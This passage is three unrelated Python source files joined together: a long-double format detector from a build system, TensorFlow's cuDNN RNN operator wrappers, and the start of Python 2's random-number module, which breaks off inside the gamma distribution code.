C99_COMPLEX_FUNCS = [ "cabs", "cacos", "cacosh", "carg", "casin", "casinh", "catan", "catanh", "ccos", "ccosh", "cexp", "cimag", "clog", "conj", "cpow", "cproj", "creal", "csin", "csinh", "csqrt", "ctan", "ctanh" ] def fname2def(name): return "HAVE_%s" % name.upper() def sym2def(symbol): define = symbol.replace(' ', '') return define.upper() def type2def(symbol): define = symbol.replace(' ', '_') return define.upper() # Code to detect long double representation taken from MPFR m4 macro def check_long_double_representation(cmd): cmd._check_compiler() body = LONG_DOUBLE_REPRESENTATION_SRC % {'type': 'long double'} # Disable whole program optimization (the default on vs2015, with python 3.5+) # which generates intermediary object files and prevents checking the # float representation. if sys.platform == "win32" and not mingw32(): try: cmd.compiler.compile_options.remove("/GL") except (AttributeError, ValueError): pass # We need to use _compile because we need the object filename src, obj = cmd._compile(body, None, None, 'c') try: ltype = long_double_representation(pyod(obj)) return ltype except ValueError: # try linking to support CC="gcc -flto" or icc -ipo # struct needs to be volatile so it isn't optimized away body = body.replace('struct', 'volatile struct') body += "int main(void) { return 0; }\n" src, obj = cmd._compile(body, None, None, 'c') cmd.temp_files.append("_configtest") cmd.compiler.link_executable([obj], "_configtest") ltype = long_double_representation(pyod("_configtest")) return ltype finally: cmd._clean() LONG_DOUBLE_REPRESENTATION_SRC = r""" /* "before" is 16 bytes to ensure there's no padding between it and "x". * We're not expecting any "long double" bigger than 16 bytes or with * alignment requirements stricter than 16 bytes. */ typedef %(type)s test_type; struct { char before[16]; test_type x; char after[8]; } foo = { { '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\0', '\001', '\043', '\105', '\147', '\211', '\253', '\315', '\357' }, -123456789.0, { '\376', '\334', '\272', '\230', '\166', '\124', '\062', '\020' } }; """ def pyod(filename): """Python implementation of the od UNIX utility (od -b, more exactly). Parameters ---------- filename : str name of the file to get the dump from. Returns ------- out : seq list of lines of od output Note ---- We only implement enough to get the necessary information for long double representation, this is not intended as a compatible replacement for od. """ def _pyod2(): out = [] fid = open(filename, 'rb') try: yo = [int(oct(int(binascii.b2a_hex(o), 16))) for o in fid.read()] for i in range(0, len(yo), 16): line = ['%07d' % int(oct(i))] line.extend(['%03d' % c for c in yo[i:i+16]]) out.append(" ".join(line)) return out finally: fid.close() def _pyod3(): out = [] fid = open(filename, 'rb') try: yo2 = [oct(o)[2:] for o in fid.read()] for i in range(0, len(yo2), 16): line = ['%07d' % int(oct(i)[2:])] line.extend(['%03d' % int(c) for c in yo2[i:i+16]]) out.append(" ".join(line)) return out finally: fid.close() if sys.version_info[0] < 3: return _pyod2() else: return _pyod3() _BEFORE_SEQ = ['000', '000', '000', '000', '000', '000', '000', '000', '001', '043', '105', '147', '211', '253', '315', '357'] _AFTER_SEQ = ['376', '334', '272', '230', '166', '124', '062', '020'] _IEEE_DOUBLE_BE = ['301', '235', '157', '064', '124', '000', '000', '000'] _IEEE_DOUBLE_LE = _IEEE_DOUBLE_BE[::-1] _INTEL_EXTENDED_12B = ['000', '000', '000', '000', '240', '242', '171', '353', '031', '300', '000', '000'] _INTEL_EXTENDED_16B = ['000', '000', '000', '000', '240', '242', '171', '353', '031', '300', '000', '000', '000', '000', '000', '000'] _MOTOROLA_EXTENDED_12B = ['300', '031', '000', '000', '353', '171', '242', '240', '000', '000', '000', '000'] _IEEE_QUAD_PREC_BE = ['300', '031', '326', '363', '105', '100', '000', '000', '000', '000', '000', '000', '000', '000', '000', '000'] _IEEE_QUAD_PREC_LE = _IEEE_QUAD_PREC_BE[::-1] _DOUBLE_DOUBLE_BE = (['301', '235', '157', '064', '124', '000', '000', '000'] + ['000'] * 8) _DOUBLE_DOUBLE_LE = (['000', '000', '000', '124', '064', '157', '235', '301'] + ['000'] * 8) def long_double_representation(lines): """Given a binary dump as given by GNU od -b, look for long double representation.""" # Read contains a list of 32 items, each item is a byte (in octal # representation, as a string). We 'slide' over the output until read is of # the form before_seq + content + after_sequence, where content is the long double # representation: # - content is 12 bytes: 80 bits Intel representation # - content is 16 bytes: 80 bits Intel representation (64 bits) or quad precision # - content is 8 bytes: same as double (not implemented yet) read = [''] * 32 saw = None for line in lines: # we skip the first word, as od -b output an index at the beginning of # each line for w in line.split()[1:]: read.pop(0) read.append(w) # If the end of read is equal to the after_sequence, read contains # the long double if read[-8:] == _AFTER_SEQ: saw = copy.copy(read) if read[:12] == _BEFORE_SEQ[4:]: if read[12:-8] == _INTEL_EXTENDED_12B: return 'INTEL_EXTENDED_12_BYTES_LE' if read[12:-8] == _MOTOROLA_EXTENDED_12B: return 'MOTOROLA_EXTENDED_12_BYTES_BE' elif read[:8] == _BEFORE_SEQ[8:]: if read[8:-8] == _INTEL_EXTENDED_16B: return 'INTEL_EXTENDED_16_BYTES_LE' elif read[8:-8] == _IEEE_QUAD_PREC_BE: return 'IEEE_QUAD_BE' elif read[8:-8] == _IEEE_QUAD_PREC_LE: return 'IEEE_QUAD_LE' elif read[8:-8] == _DOUBLE_DOUBLE_BE: return 'DOUBLE_DOUBLE_BE' elif read[8:-8] == _DOUBLE_DOUBLE_LE: return 'DOUBLE_DOUBLE_LE' elif read[:16] == _BEFORE_SEQ: if read[16:-8] == _IEEE_DOUBLE_LE: return 'IEEE_DOUBLE_LE' elif read[16:-8] == _IEEE_DOUBLE_BE: return 'IEEE_DOUBLE_BE' if saw is not None: raise ValueError("Unrecognized format (%s)" % saw) else: # We never detected the after_sequence raise ValueError("Could not lock sequences (%s)" % saw)
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Cudnn RNN operators.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import itertools from tensorflow.contrib.cudnn_rnn.ops import gen_cudnn_rnn_ops from tensorflow.contrib.util import loader from tensorflow.python.framework import common_shapes from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import random_seed from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import state_ops from tensorflow.python.platform import resource_loader from tensorflow.python.training import saver _cudnn_rnn_ops_so = loader.load_op_library( resource_loader.get_path_to_datafile("_cudnn_rnn_ops.so")) # TODO(yaozhang): make sure we only save the canonical version of params and # don't save the platform-specific version to avoid potential race # conditions where params is updated by both versions when being restored. # Currently, checkpointing will function properly, despite that we save both # versions, because Saver restores customized savables after Variables. # However, it is good to not rely on this restoring order of Saver and to # avoid unnecessary storage. Add a test to check only the canonical version is # saved. class RNNParamsSaveable(saver.BaseSaverBuilder.SaveableObject): """SaveableObject implementation that handles the RNN params variable.""" def __init__(self, params_to_canonical, canonical_to_params, param_variables, name="params_canonical"): """Creates a RNNParamsSaveable object. RNNParamsSaveable is saveable/restorable in a checkpoint file and is used to save/restore the weights and biases parameters in a canonical format, where parameters are saved as tensors layer by layer. For each layer, the bias tensors are saved following the weight tensors. When restoring, a user could name param_variables as desired, and restore weight and bias tensors to these variables. For CudnnRNNRelu or CudnnRNNTanh, there are 2 tensors per weight and per bias for each layer: tensor 0 is applied to the input from the previous layer and tensor 1 to the recurrent input. For CudnnLSTM, there are 8 tensors per weight and per bias for each layer: tensor 0-3 are applied to the input from the previous layer and tensor 4-7 to the recurrent input. Tensor 0 and 4 are for the input gate; tensor 1 and 5 the forget gate; tensor 2 and 6 the new memory gate; tensor 3 and 7 the output gate. For CudnnGRU, there are 6 tensors per weight and per bias for each layer: tensor 0-2 are applied to the input from the previous layer and tensor 3-5 to the recurrent input. Tensor 0 and 3 are for the reset gate; tensor 1 and 4 the update gate; tensor 2 and 5 the new memory gate. Args: params_to_canonical: a function to convert params from a specific format for cuDNN or other RNN ops to the canonical format. _CudnnRNN.params_to_canonical() should be provided here. canonical_to_params: a function to convert params from the canonical format to a specific format for cuDNN or other RNN ops. The function must return a scalar (e.g. in the case of cuDNN) or a tuple. This function could be _CudnnRNN.canonical_to_params() or a user-defined function. param_variables: a list of Variables for parameters in a specific form. For cuDNN RNN ops, this is a single merged variable for both weights and biases; for other RNN ops, this might be multiple unmerged or partially merged variables respectively for weights and biases. name: the name of the RNNParamsSaveable object. """ # There is only a single merged parameter variable for cuDNN when saving. weights, biases = params_to_canonical(param_variables[0]) self._canonical_to_params = canonical_to_params self._variables = param_variables # We currently don't use slice_spec. It might be useful in a distributed # setting where each parameter server node stores a slice of variable, # instead of having the master pull all slices and then save them. slice_spec = "" specs = [ saver.BaseSaverBuilder.SaveSpec(param, slice_spec, param.name) for param in itertools.chain(weights, biases) ] super(RNNParamsSaveable, self).__init__(None, specs, name) def restore(self, restored_tensors, restored_shapes): weights = restored_tensors[:len(restored_tensors) // 2] biases = restored_tensors[len(restored_tensors) // 2:] params = self._canonical_to_params(weights, biases) if not isinstance(params, tuple): params = (params,) assign_ops = [ state_ops.assign(variable, param, validate_shape=False) for variable, param in zip(self._variables, params) ] return control_flow_ops.group(*assign_ops) _cudnn_rnn_common_doc_string = """ Cudnn RNN has an opaque parameter buffer that can be used for inference and training. But it is possible that the layout of the parameter buffers changes between generations. So it is highly recommended to use RNNParamsSaveable to save and restore weights and biases in a canonical format. This is a typical use case: * The user creates a CudnnRNN model. * The user query that parameter buffer size. * The user creates a variable of that size that serves as the parameter buffers. * The user either initialize the parameter buffer, or load the canonical weights into the parameter buffer. * The user calls the model with the parameter buffer for inference, or training. * If training, the user creates a Saver object. * If training, the user creates a RNNParamsSaveable object from the parameter buffer for it to be later saved in the canonical format. When creating a RNNParamsSaveable object, a name could be provided, which is useful in distinguishing the names of multiple RNNParamsSaveable objects (e.g. for an encoder-decoder model). * Once a while, the user saves the parameter buffer into model checkpoints with Saver.save(). * When restoring, the user creates a RNNParamsSaveable object and uses Saver.restore() to restore the parameter buffer from the canonical format to a user-defined format, as well as to restore other savable objects in the checkpoint file. """ class _CudnnRNN(object): """Creates an RNN model using the underlying Cudnn implementation. Note that self._NUM_PARAMS_PER_LAYER is the number of parameter sets of weight and bias per layer. It needs to be defined in subclasses. """ __doc__ += _cudnn_rnn_common_doc_string def __init__(self, rnn_mode, num_layers, num_units, input_size, input_mode="linear_input", direction="unidirectional", dropout=0., seed=0): """Creates a CudnnRNN model from model spec. Args: rnn_mode: a string specifies the mode, under which this RNN model runs. Could be either 'lstm', 'gru', 'rnn_tanh' or 'rnn_relu'. num_layers: the number of layers for the RNN model. num_units: the number of units within the RNN model. input_size: the size of the input, it could be different from the num_units. input_mode: indicate whether there is a linear projection between the input and the actual computation before the first layer. It could be 'linear_input', 'skip_input' or 'auto_select'. 'linear_input' (default) always applies a linear projection of input onto RNN hidden state. (standard RNN behavior). 'skip_input' is only allowed when input_size == num_units; 'auto_select' implies 'skip_input' when input_size == num_units; otherwise, it implies 'linear_input'. direction: the direction model that the model operates. Could be either 'unidirectional' or 'bidirectional' dropout: whether to enable dropout. With it is 0, dropout is disabled. seed: the op seed used for initializing dropout. See @{tf.set_random_seed} for behavior. """ self._num_layers = num_layers self._num_units = num_units self._input_size = input_size self._rnn_mode = rnn_mode self._input_mode = input_mode self._direction = direction self._dropout = dropout # get graph and op seed. self._seed, self._seed2 = random_seed.get_seed(seed) if self._seed is None and self._seed2 is None: self._seed, self._seed2 = 0, 0 def params_size(self): """Calculates the size of the opaque parameter buffer needed for this model. Returns: The calculated parameter buffer size. """ return gen_cudnn_rnn_ops.cudnn_rnn_params_size( num_layers=self._num_layers, num_units=self._num_units, input_size=self._input_size, T=dtypes.float32, S=dtypes.int32, dropout=self._dropout, seed=self._seed, seed2=self._seed2, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction)[0] def __call__(self, input_data, input_h, input_c, params, is_training=True): """Runs the forward step for the RNN model. Args: input_data: the input sequence to the RNN model. input_h: the initial hidden state for h. input_c: the initial hidden state for c. This is only relevant for LSTM. params: the parameter buffer created for this model. is_training: whether this operation will be used in training or inference. Returns: output: the output sequuence. output_h: the final state for h. output_c: the final state for c. This is only relevant for LSTM. """ if self._rnn_mode != "lstm": # For model that doesn't take input_c, replace with a dummy tensor. input_c = array_ops.constant([], dtype=dtypes.float32) output, output_h, output_c, _ = gen_cudnn_rnn_ops.cudnn_rnn( input=input_data, input_h=input_h, input_c=input_c, params=params, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction, dropout=self._dropout, seed=self._seed, seed2=self._seed2, is_training=is_training) return (output, output_h, output_c) def params_to_canonical(self, params): """Converts params from a specific format of cuDNN to the canonical format. Args: params: a Variable for weight and bias parameters. Returns: A function for the specific-to-canonical conversion. """ weights, biases = gen_cudnn_rnn_ops.cudnn_rnn_params_to_canonical( num_layers=self._num_layers, num_units=self._num_units, input_size=self._input_size, params=params, dropout=self._dropout, seed=self._seed, seed2=self._seed2, num_params=self._num_layers * self._NUM_PARAMS_PER_LAYER, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction) return weights, biases def canonical_to_params(self, weights, biases): """Converts params from the canonical format to a specific format of cuDNN. Args: weights: a Tensor for weight parameters. biases: a Tensor for bias parameters. Returns: A function for the canonical-to-params-to-specific conversion.. """ return gen_cudnn_rnn_ops.cudnn_rnn_canonical_to_params( num_layers=self._num_layers, num_units=self._num_units, input_size=self._input_size, weights=weights, biases=biases, dropout=self._dropout, seed=self._seed, seed2=self._seed2, rnn_mode=self._rnn_mode, input_mode=self._input_mode, direction=self._direction) class CudnnLSTM(_CudnnRNN): """Cudnn implementation of the LSTM model.""" __doc__ += _cudnn_rnn_common_doc_string # 4 sets of weight and bias parameters for the recurrent input, and 4 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 8 def __init__(self, num_layers, num_units, input_size, input_mode="auto_select", direction="unidirectional", dropout=0., seed=0): """Creates a Cudnn LSTM model from model spec. Args: num_layers: the number of layers for the RNN model. num_units: the number of units within the RNN model. input_size: the size of the input, it could be different from the num_units. input_mode: indicate whether there is a linear projection between the input and The actual computation before the first layer. It could be 'skip_input', 'linear_input' or 'auto_select'. 'skip_input' is only allowed when input_size == num_units; 'auto_select' implies 'skip_input' when input_size == num_units; otherwise, it implies 'linear_input'. direction: the direction model that the model operates. Could be either 'unidirectional' or 'bidirectional' dropout: whether to enable dropout. With it is 0, dropout is disabled. seed: the seed used for initializing dropout. """ super(CudnnLSTM, self).__init__( "lstm", num_layers, num_units, input_size, input_mode=input_mode, direction=direction, dropout=dropout, seed=seed) def __call__(self, input_data, input_h, input_c, params, is_training=True): """Runs the forward step for the Cudnn LSTM model. Args: input_data: the input sequence to the LSTM model. input_h: the initial hidden state for h. input_c: the initial hidden state for c. params: the parameter buffer created for this model. is_training: whether this operation will be used in training or inference. Returns: output: the output sequuence. output_h: the final state for h. output_c: the final state for c. """ output, output_h, output_c = super(CudnnLSTM, self).__call__( input_data, input_h, input_c, params, is_training=is_training) return (output, output_h, output_c) class _CudnnRNNNoInputC(_CudnnRNN): """Simple CudnnRNN models without input_c.""" __doc__ += _cudnn_rnn_common_doc_string def __init__(self, num_layers, num_units, input_size, input_mode="auto_select", direction="unidirectional", dropout=0., seed=0): """Creates a Cudnn RNN model from model without hidden-state C. Args: num_layers: the number of layers for the RNN model. num_units: the number of units within the RNN model. input_size: the size of the input, it could be different from the num_units. input_mode: indicate whether there is a linear projection between the input and The actual computation before the first layer. It could be 'skip_input', 'linear_input' or 'auto_select'. 'skip_input' is only allowed when input_size == num_units; 'auto_select' implies 'skip_input' when input_size == num_units; otherwise, it implies 'linear_input'. direction: the direction model that the model operates. Could be either 'unidirectional' or 'bidirectional' dropout: whether to enable dropout. With it is 0, dropout is disabled. seed: the seed used for initializing dropout. """ super(_CudnnRNNNoInputC, self).__init__( self._rnn_mode, num_layers, num_units, input_size, input_mode=input_mode, direction=direction, dropout=dropout, seed=seed) def __call__(self, input_data, input_h, params, is_training=True): """Runs the forward step for the Cudnn LSTM model. Args: input_data: the input sequence to the LSTM model. input_h: the initial hidden state for h. params: the parameter buffer created for this model. is_training: whether this operation will be used in training or inference. Returns: output: the output sequuence. output_h: the final state for h. """ output, output_h, _ = super(_CudnnRNNNoInputC, self).__call__( input_data, input_h, None, params, is_training=is_training) return (output, output_h) class CudnnGRU(_CudnnRNNNoInputC): """Cudnn implementation of the GRU model.""" __doc__ += _cudnn_rnn_common_doc_string _rnn_mode = "gru" # 3 sets of weight and bias parameters for the recurrent input, and 3 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 6 class CudnnRNNTanh(_CudnnRNNNoInputC): """Cudnn implementation of the RNN-tanh model.""" __doc__ += _cudnn_rnn_common_doc_string _rnn_mode = "rnn_tanh" # 1 set of weight and bias parameters for the recurrent input, and 1 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 2 class CudnnRNNRelu(_CudnnRNNNoInputC): """Cudnn implementation of the RNN-relu model.""" __doc__ += _cudnn_rnn_common_doc_string _rnn_mode = "rnn_relu" # 1 set of weight and bias parameters for the recurrent input, and 1 for the # previous layer input. _NUM_PARAMS_PER_LAYER = 2 @ops.RegisterGradient("CudnnRNN") def _cudnn_rnn_backward(op, *grad): if not op.get_attr("is_training"): raise ValueError( "CudnnRNN must set is_training to True to be used in gradients") return gen_cudnn_rnn_ops.cudnn_rnn_backprop( input=op.inputs[0], input_h=op.inputs[1], input_c=op.inputs[2], params=op.inputs[3], output=op.outputs[0], output_h=op.outputs[1], output_c=op.outputs[2], output_backprop=grad[0], output_h_backprop=grad[1], output_c_backprop=grad[2], reserve_space=op.outputs[3], dropout=op.get_attr("dropout"), seed=op.get_attr("seed"), seed2=op.get_attr("seed2"), rnn_mode=op.get_attr("rnn_mode"), input_mode=op.get_attr("input_mode"), direction=op.get_attr("direction")) ops.RegisterShape("CudnnRNNParamsSize")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNNParamsToCanonical")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNNCanonicalToParams")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNN")(common_shapes.call_cpp_shape_fn) ops.RegisterShape("CudnnRNNBackprop")(common_shapes.call_cpp_shape_fn)
"""Random variable generators. integers -------- uniform within range sequences --------- pick random element pick random sample generate random permutation distributions on the real line: ------------------------------ uniform triangular normal (Gaussian) lognormal negative exponential gamma beta pareto Weibull distributions on the circle (angles 0 to 2pi) --------------------------------------------- circular uniform von Mises General notes on the underlying Mersenne Twister core generator: * The period is 2**19937-1. * It is one of the most extensively tested generators in existence. * Without a direct way to compute N steps forward, the semantics of jumpahead(n) are weakened to simply jump to another distant state and rely on the large period to avoid overlapping sequences. * The random() method is implemented in C, executes in a single Python step, and is, therefore, threadsafe. """ from __future__ import division from warnings import warn as _warn from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin from os import urandom as _urandom from binascii import hexlify as _hexlify __all__ = ["Random","seed","random","uniform","randint","choice","sample", "randrange","shuffle","normalvariate","lognormvariate", "expovariate","vonmisesvariate","gammavariate","triangular", "gauss","betavariate","paretovariate","weibullvariate", "getstate","setstate","jumpahead", "WichmannHill", "getrandbits", "SystemRandom"] NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0) TWOPI = 2.0*_pi LOG4 = _log(4.0) SG_MAGICCONST = 1.0 + _log(4.5) BPF = 53 # Number of bits in a float RECIP_BPF = 2**-BPF # Translated by Guido van Rossum from C source provided by # Adrian Baddeley. Adapted by Raymond Hettinger for use with # the Mersenne Twister and os.urandom() core generators. import _random class Random(_random.Random): """Random number generator base class used by bound module functions. Used to instantiate instances of Random to get generators that don't share state. Especially useful for multi-threaded programs, creating a different instance of Random for each thread, and using the jumpahead() method to ensure that the generated sequences seen by each thread don't overlap. Class Random can also be subclassed if you want to use a different basic generator of your own devising: in that case, override the following methods: random(), seed(), getstate(), setstate() and jumpahead(). Optionally, implement a getrandbits() method so that randrange() can cover arbitrarily large ranges. """ VERSION = 3 # used by getstate/setstate def __init__(self, x=None): """Initialize an instance. Optional argument x controls seeding, as for Random.seed(). """ self.seed(x) self.gauss_next = None def seed(self, a=None): """Initialize internal state from hashable object. None or no argument seeds from current time or from an operating system specific randomness source if available. If a is not None or an int or long, hash(a) is used instead. """ if a is None: try: a = long(_hexlify(_urandom(16)), 16) except NotImplementedError: import time a = long(time.time() * 256) # use fractional seconds super(Random, self).seed(a) self.gauss_next = None def getstate(self): """Return internal state; can be passed to setstate() later.""" return self.VERSION, super(Random, self).getstate(), self.gauss_next def setstate(self, state): """Restore internal state from object returned by getstate().""" version = state[0] if version == 3: version, internalstate, self.gauss_next = state super(Random, self).setstate(internalstate) elif version == 2: version, internalstate, self.gauss_next = state # In version 2, the state was saved as signed ints, which causes # inconsistencies between 32/64-bit systems. The state is # really unsigned 32-bit ints, so we convert negative ints from # version 2 to positive longs for version 3. try: internalstate = tuple( long(x) % (2**32) for x in internalstate ) except ValueError, e: raise TypeError, e super(Random, self).setstate(internalstate) else: raise ValueError("state with version %s passed to " "Random.setstate() of version %s" % (version, self.VERSION)) ## ---- Methods below this point do not need to be overridden when ## ---- subclassing for the purpose of using a different core generator. ## -------------------- pickle support ------------------- def __getstate__(self): # for pickle return self.getstate() def __setstate__(self, state): # for pickle self.setstate(state) def __reduce__(self): return self.__class__, (), self.getstate() ## -------------------- integer methods ------------------- def randrange(self, start, stop=None, step=1, int=int, default=None, maxwidth=1L<<BPF): """Choose a random item from range(start, stop[, step]). This fixes the problem with randint() which includes the endpoint; in Python this is usually not what you want. Do not supply the 'int', 'default', and 'maxwidth' arguments. """ # This code is a bit messy to make it fast for the # common case while still doing adequate error checking. istart = int(start) if istart != start: raise ValueError, "non-integer arg 1 for randrange()" if stop is default: if istart > 0: if istart >= maxwidth: return self._randbelow(istart) return int(self.random() * istart) raise ValueError, "empty range for randrange()" # stop argument supplied. istop = int(stop) if istop != stop: raise ValueError, "non-integer stop for randrange()" width = istop - istart if step == 1 and width > 0: # Note that # int(istart + self.random()*width) # instead would be incorrect. For example, consider istart # = -2 and istop = 0. Then the guts would be in # -2.0 to 0.0 exclusive on both ends (ignoring that random() # might return 0.0), and because int() truncates toward 0, the # final result would be -1 or 0 (instead of -2 or -1). # istart + int(self.random()*width) # would also be incorrect, for a subtler reason: the RHS # can return a long, and then randrange() would also return # a long, but we're supposed to return an int (for backward # compatibility). if width >= maxwidth: return int(istart + self._randbelow(width)) return int(istart + int(self.random()*width)) if step == 1: raise ValueError, "empty range for randrange() (%d,%d, %d)" % (istart, istop, width) # Non-unit step argument supplied. istep = int(step) if istep != step: raise ValueError, "non-integer step for randrange()" if istep > 0: n = (width + istep - 1) // istep elif istep < 0: n = (width + istep + 1) // istep else: raise ValueError, "zero step for randrange()" if n <= 0: raise ValueError, "empty range for randrange()" if n >= maxwidth: return istart + istep*self._randbelow(n) return istart + istep*int(self.random() * n) def randint(self, a, b): """Return random integer in range [a, b], including both end points. """ return self.randrange(a, b+1) def _randbelow(self, n, _log=_log, int=int, _maxwidth=1L<<BPF, _Method=_MethodType, _BuiltinMethod=_BuiltinMethodType): """Return a random int in the range [0,n) Handles the case where n has more bits than returned by a single call to the underlying generator. """ try: getrandbits = self.getrandbits except AttributeError: pass else: # Only call self.getrandbits if the original random() builtin method # has not been overridden or if a new getrandbits() was supplied. # This assures that the two methods correspond. if type(self.random) is _BuiltinMethod or type(getrandbits) is _Method: k = int(1.00001 + _log(n-1, 2.0)) # 2**k > n-1 > 2**(k-2) r = getrandbits(k) while r >= n: r = getrandbits(k) return r if n >= _maxwidth: _warn("Underlying random() generator does not supply \n" "enough bits to choose from a population range this large") return int(self.random() * n) ## -------------------- sequence methods ------------------- def choice(self, seq): """Choose a random element from a non-empty sequence.""" return seq[int(self.random() * len(seq))] # raises IndexError if seq is empty def shuffle(self, x, random=None, int=int): """x, random=random.random -> shuffle list x in place; return None. Optional arg random is a 0-argument function returning a random float in [0.0, 1.0); by default, the standard random.random. """ if random is None: random = self.random for i in reversed(xrange(1, len(x))): # pick an element in x[:i+1] with which to exchange x[i] j = int(random() * (i+1)) x[i], x[j] = x[j], x[i] def sample(self, population, k): """Chooses k unique random elements from a population sequence. Returns a new list containing elements from the population while leaving the original population unchanged. The resulting list is in selection order so that all sub-slices will also be valid random samples. This allows raffle winners (the sample) to be partitioned into grand prize and second place winners (the subslices). Members of the population need not be hashable or unique. If the population contains repeats, then each occurrence is a possible selection in the sample. To choose a sample in a range of integers, use xrange as an argument. This is especially fast and space efficient for sampling from a large population: sample(xrange(10000000), 60) """ # XXX Although the documentation says `population` is "a sequence", # XXX attempts are made to cater to any iterable with a __len__ # XXX method. This has had mixed success. Examples from both # XXX sides: sets work fine, and should become officially supported; # XXX dicts are much harder, and have failed in various subtle # XXX ways across attempts. Support for mapping types should probably # XXX be dropped (and users should pass mapping.keys() or .values() # XXX explicitly). # Sampling without replacement entails tracking either potential # selections (the pool) in a list or previous selections in a set. # When the number of selections is small compared to the # population, then tracking selections is efficient, requiring # only a small set and an occasional reselection. For # a larger number of selections, the pool tracking method is # preferred since the list takes less space than the # set and it doesn't suffer from frequent reselections. n = len(population) if not 0 <= k <= n: raise ValueError, "sample larger than population" random = self.random _int = int result = [None] * k setsize = 21 # size of a small set minus size of an empty list if k > 5: setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets if n <= setsize or hasattr(population, "keys"): # An n-length list is smaller than a k-length set, or this is a # mapping type so the other algorithm wouldn't work. pool = list(population) for i in xrange(k): # invariant: non-selected at [0,n-i) j = _int(random() * (n-i)) result[i] = pool[j] pool[j] = pool[n-i-1] # move non-selected item into vacancy else: try: selected = set() selected_add = selected.add for i in xrange(k): j = _int(random() * n) while j in selected: j = _int(random() * n) selected_add(j) result[i] = population[j] except (TypeError, KeyError): # handle (at least) sets if isinstance(population, list): raise return self.sample(tuple(population), k) return result ## -------------------- real-valued distributions ------------------- ## -------------------- uniform distribution ------------------- def uniform(self, a, b): "Get a random number in the range [a, b) or [a, b] depending on rounding." return a + (b-a) * self.random() ## -------------------- triangular -------------------- def triangular(self, low=0.0, high=1.0, mode=None): """Triangular distribution. Continuous distribution bounded by given lower and upper limits, and having a given mode value in-between. http://en.wikipedia.org/wiki/Triangular_distribution """ u = self.random() c = 0.5 if mode is None else (mode - low) / (high - low) if u > c: u = 1.0 - u c = 1.0 - c low, high = high, low return low + (high - low) * (u * c) ** 0.5 ## -------------------- normal distribution -------------------- def normalvariate(self, mu, sigma): """Normal distribution. mu is the mean, and sigma is the standard deviation. """ # mu = mean, sigma = standard deviation # Uses Kinderman and Monahan method. Reference: Kinderman, # A.J. and Monahan, J.F., "Computer generation of random # variables using the ratio of uniform deviates", ACM Trans # Math Software, 3, (1977), pp257-260. random = self.random while 1: u1 = random() u2 = 1.0 - random() z = NV_MAGICCONST*(u1-0.5)/u2 zz = z*z/4.0 if zz <= -_log(u2): break return mu + z*sigma ## -------------------- lognormal distribution -------------------- def lognormvariate(self, mu, sigma): """Log normal distribution. If you take the natural logarithm of this distribution, you'll get a normal distribution with mean mu and standard deviation sigma. mu can have any value, and sigma must be greater than zero. """ return _exp(self.normalvariate(mu, sigma)) ## -------------------- exponential distribution -------------------- def expovariate(self, lambd): """Exponential distribution. lambd is 1.0 divided by the desired mean. It should be nonzero. (The parameter would be called "lambda", but that is a reserved word in Python.) Returned values range from 0 to positive infinity if lambd is positive, and from negative infinity to 0 if lambd is negative. """ # lambd: rate lambd = 1/mean # ('lambda' is a Python reserved word) random = self.random u = random() while u <= 1e-7: u = random() return -_log(u)/lambd ## -------------------- von Mises distribution -------------------- def vonmisesvariate(self, mu, kappa): """Circular data distribution. mu is the mean angle, expressed in radians between 0 and 2*pi, and kappa is the concentration parameter, which must be greater than or equal to zero. If kappa is equal to zero, this distribution reduces to a uniform random angle over the range 0 to 2*pi. """ # mu: mean angle (in radians between 0 and 2*pi) # kappa: concentration parameter kappa (>= 0) # if kappa = 0 generate uniform random angle # Based upon an algorithm published in: Fisher, N.I., # "Statistical Analysis of Circular Data", Cambridge # University Press, 1993. # Thanks to Magnus Kessler for a correction to the # implementation of step 4. random = self.random if kappa <= 1e-6: return TWOPI * random() a = 1.0 + _sqrt(1.0 + 4.0 * kappa * kappa) b = (a - _sqrt(2.0 * a))/(2.0 * kappa) r = (1.0 + b * b)/(2.0 * b) while 1: u1 = random() z = _cos(_pi * u1) f = (1.0 + r * z)/(r + z) c = kappa * (r - f) u2 = random() if u2 < c * (2.0 - c) or u2 <= c * _exp(1.0 - c): break u3 = random() if u3 > 0.5: theta = (mu % TWOPI) + _acos(f) else: theta = (mu % TWOPI) - _acos(f) return theta ## -------------------- gamma distribution -------------------- def gammavariate(self, alpha, beta): """Gamma distribution. Not the gamma function! Conditions on the parameters are alpha > 0 and beta > 0. """ # alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2 # Warning: a few older sources define the gamma distribution in terms # of alpha > -1.0 if alpha <= 0.0 or beta <= 0.0: raise ValueError, 'gammavariate: alpha and beta must be > 0.0' random = self.random if alpha > 1.0: # Uses R.C.H. Cheng, "The generation of Gamma # variables with non-integral shape parameters", # Applied Statistics, (1977), 26, No. 1, p71-74 ainv = _sqrt(2.0 * alpha - 1.0) bbb = alpha - LOG4 ccc = alpha + ainv while 1: u1 = random() if not 1e-7 < u1 < .9999999: continue u2 = 1.0 - random() v = _log(u1/(1.0-u1))/ainv x = alpha*_exp(v) z = u1*u1*u2 r = bbb+ccc*v-x if r + 